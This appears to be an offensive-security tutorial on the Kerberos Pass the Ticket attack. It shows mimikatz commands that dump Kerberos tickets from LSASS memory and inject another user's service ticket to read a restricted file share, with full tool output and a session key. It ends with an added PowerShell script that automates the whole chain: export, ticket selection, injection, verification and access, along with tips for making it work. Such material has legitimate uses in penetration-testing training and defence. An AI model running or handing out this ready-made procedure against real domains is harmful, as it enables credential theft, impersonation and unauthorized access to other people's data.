Pass The Ticket
Recap
Kerberos authentication is built on tickets: a client first obtains a Ticket Granting Ticket (TGT) from the KDC, then presents it to the Ticket Granting Service (TGS) to obtain a service ticket for one specific service (for example cifs/web04). Both kinds of ticket are cached in LSASS memory on the host where the user logged on. The Pass the Ticket attack exports such a ticket from memory and re-injects it into another logon session, on the same host or elsewhere on the network, so that the attacker can authenticate as the ticket's owner to the service the ticket was issued for.
In this scenario we abuse an existing logon session of the user "dave" on a host we control. We will export dave's tickets with mimikatz and inject his service ticket for WEB04 into our own session as the user "jen", which lets us read files that only dave's permissions allow.
Attack
To demonstrate the attack, we are going to extract every TGT and service ticket currently held in LSASS memory and inject dave's service ticket for WEB04 into our own session. This requires local administrator rights on a host where dave has a live session. Once the ticket is injected, the restricted folder on WEB04 becomes readable.
Verify Jen does not have Access
We can verify that Jen does not have access to the following folder:
PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.
At line:1 char:1
+ ls \\web04\backup
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\web04\backup:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Launch Mimikatz
privilege::debug enables SeDebugPrivilege, which is why mimikatz must run as a local administrator; without it LSASS memory cannot be read. sekurlsa::tickets /export then walks the LSASS process for the Kerberos tickets of every logon session on the host and writes each TGT and service ticket to disk in mimikatz's kirbi format.
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::tickets /export
Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session : Batch from 0
User Name : dave
Domain : CORP
Logon Server : DC1
Logon Time : 9/14/2022 6:24:17 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1103
* Username : dave
* Domain : CORP.COM
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
Target Name (02) : krbtgt ; CORP ; @ CORP.COM
Client Name (01) : dave ; @ CORP.COM ( CORP )
Flags 40c10000 : name_canonicalize ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1f1626][email protected] !
...
Verify Generated Tickets
We can verify the exported tickets by listing the files with the .kirbi extension. mimikatz builds each file name from the logon session ID, the ticket group and index, the ticket flags, and the client and service names, so dave's tickets can be told apart from those of the other sessions by name alone.
PS C:\Tools> dir *.kirbi
Directory: C:\Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/14/2022 6:24 AM 1561 [0;12bd0][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;12bd0][email protected]
-a---- 9/14/2022 6:24 AM 1561 [0;1c6860][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;1c6860][email protected]
-a---- 9/14/2022 6:24 AM 1561 [0;1c7bcc][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;1c7bcc][email protected]
-a---- 9/14/2022 6:24 AM 1561 [0;1c933d][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;1c933d][email protected]
-a---- 9/14/2022 6:24 AM 1561 [0;1ca6c2][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;1ca6c2][email protected]
...
Selecting TGS Ticket
Many tickets have been exported, one set per logon session on the host. We are not free to pick just any of them: we need the service ticket that was issued to dave for cifs/web04, so choose the kirbi file whose name carries dave as the client and that service. Injecting it into our current session with kerberos::ptt (pass the ticket) needs no special privileges, as it only writes to our own ticket cache:
mimikatz # kerberos::ptt [0;12bd0][email protected]
* File: '[0;12bd0][email protected]': OK
Verifying Ticket Injection in Session
Let's verify that the ticket was injected by running klist, which lists the Kerberos tickets cached in the current logon session:
PS C:\Tools> klist
Current LogonId is 0:0x13bca7
Cached Tickets: (1)
#0> Client: dave @ CORP.COM
Server: cifs/web04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
Start Time: 9/14/2022 5:31:32 (local)
End Time: 9/14/2022 15:31:13 (local)
Renew Time: 9/21/2022 5:31:13 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
Confirming Success
Note that our logon session is still jen's (the LogonId is unchanged); only the ticket cache now holds a ticket issued to dave, and that ticket is good only for cifs/web04 and only until its End Time. Injecting dave's TGT instead would let us request service tickets for any service as dave. Let's confirm that the attack worked by accessing the folder we were initially denied:
PS C:\Tools> ls \\web04\backup
Directory: \\web04\backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2022 2:52 AM 0 backup_schemata.txt
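The whole procedure above (baseline check, export, ticket selection, injection, klist verification, re-test), as an added PowerShell example that is not part of the original page. It assumes mimikatz.exe lives in C:\Tools, that the script runs from an elevated PowerShell on the host where dave's session exists, and that mimikatz names exported files with the client and service names in the form `<user>@<svc>-<host>.kirbi`; the user, service and share are the ones used on this page.

```powershell
# Added example (not from the original page): automate the Pass the Ticket steps.
# Assumptions: mimikatz.exe in C:\Tools, elevated PowerShell (privilege::debug
# needs local admin), victim "dave" has a live session on this host, and the
# exported file name contains "<user>@<svc>-<host>" as mimikatz writes it.
param(
    [string]$MimikatzPath = 'C:\Tools\mimikatz.exe',   # assumption: mimikatz location
    [string]$TargetUser   = 'dave',                    # victim whose ticket we reuse
    [string]$Service      = 'cifs/web04',              # SPN the ticket must be for
    [string]$Share        = '\\web04\backup'           # resource we want to reach
)

$ErrorActionPreference = 'Stop'
Set-Location (Split-Path -Parent $MimikatzPath)

# Returns $true if the share lists, $false on any error (access denied, unreachable).
function Test-ShareAccess([string]$Path) {
    try   { Get-ChildItem -Path $Path -ErrorAction Stop | Out-Null; return $true }
    catch { return $false }
}

# 1. Baseline: as jen we expect to be denied before the ticket is injected.
"Running as $(whoami); access to $Share before injection: $(Test-ShareAccess $Share)"

# 2. Export every TGT/TGS in LSASS to .kirbi files. mimikatz accepts its
#    commands as arguments, so this is the interactive session from the page.
$before = Get-ChildItem -Filter '*.kirbi' | Select-Object -ExpandProperty Name
& $MimikatzPath 'privilege::debug' 'sekurlsa::tickets /export' 'exit' | Out-Null
$exported = Get-ChildItem -Filter '*.kirbi' | Where-Object { $_.Name -notin $before }
if (-not $exported) { throw 'No tickets exported: are we local admin, and is LSASS readable?' }

# 3. Select the victim's service ticket for our SPN. The "-like" pattern is the
#    assumed mimikatz naming ("dave@cifs-web04"); on a mismatch we list what was
#    exported so the operator can pick by hand instead of injecting a wrong ticket.
$svcTag = $Service -replace '/', '-'
$ticket = $exported | Where-Object { $_.Name -like "*-${TargetUser}@${svcTag}*" } | Select-Object -First 1
if (-not $ticket) {
    "No $Service ticket for $TargetUser found. Exported tickets:"
    $exported | ForEach-Object { "  $($_.Name)" }
    throw "Target ticket missing; $TargetUser may have no session on this host."
}

# 4. Inject the ticket into our current logon session (no new logon, same LogonId).
& $MimikatzPath "kerberos::ptt `"$($ticket.FullName)`"" 'exit' | Out-Null

# 5. Verify with klist that the cache now holds a ticket issued to the victim for our SPN.
$klist = klist | Out-String
if ($klist -notmatch "Client:\s+$TargetUser @" -or
    $klist -notmatch "Server:\s+$([regex]::Escape($Service)) @") {
    throw "klist does not show a $TargetUser ticket for $Service; injection failed"
}

# 6. Re-test: the share should now open, authenticated as dave over Kerberos.
"Access to $Share after injection: $(Test-ShareAccess $Share)"
Get-ChildItem -Path $Share
```

Two practical points the script relies on: the share must be addressed by host name, because an SMB connection to an IP address falls back to NTLM and the injected cifs/web04 ticket is never used; and the injected ticket expires at its End Time, after which the script has to be re-run (or dave's TGT injected instead, so fresh service tickets can be requested).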